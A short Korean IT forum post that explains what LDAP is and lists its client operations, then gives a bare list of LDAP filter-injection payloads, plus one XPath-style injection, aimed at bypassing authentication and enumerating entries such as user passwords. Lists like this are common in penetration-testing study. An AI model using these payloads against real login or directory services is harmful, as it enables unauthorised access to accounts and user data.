LDAP와 payload

홈 > IT > IT정보
IT정보

LDAP와 payload

3 Selovic 0 53 0 0
LDAP란?
경량 디렉터리 엑세스 프로토콜의 약자(Lightweigth Directory Access Protocol)의 약자로,
분산디렉터리 서비스를 제공하는 공개된 프로토콜.
TCP/IP단에서 디렉터리 서비스를 조회하고 수정하는 응용프로토콜입니다.
즉, TCP/IP 5계층에서 가장 상단의 계층에서 동작합니다.
특이사항으로 Lightweight 라고해서 프로토콜의 스펙이 가볍다는 것이 아닙니다.
모체가 되는 DAP에서 발전된 것이 LDAP이고, 대역폭 측면에서 가벼움을 표시한 것입니다.

/*클라이언트는 LDAP에게 아래 명령을 실행할 수 있습니다.*/

StartTLS // 보안접속을 위해 LDAPv3 TLS 확장사용
Bind // LDAP프로토콜 버전 인증 및 지정
Search // 디렉터리 엔트리 검색 및 확인
Compare // 엔트리가 주어진 값을 포함하는지 확인(테스트)
Modify DN // 엔트리를 이동하거나 이름변경
Abandon // 이전의 요청 중단(서버가 무시할 수 있습니다)
Extended Operation // 다른 Operation 정의를 위해 사용되는 일반 오퍼레이션
Unbind // 연결종료 (Bind랑 관련없음)

/*payload*/
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

,

Category
Facebook Twitter GooglePlus KakaoStory KakaoTalk NaverBand
PlusFriend Chat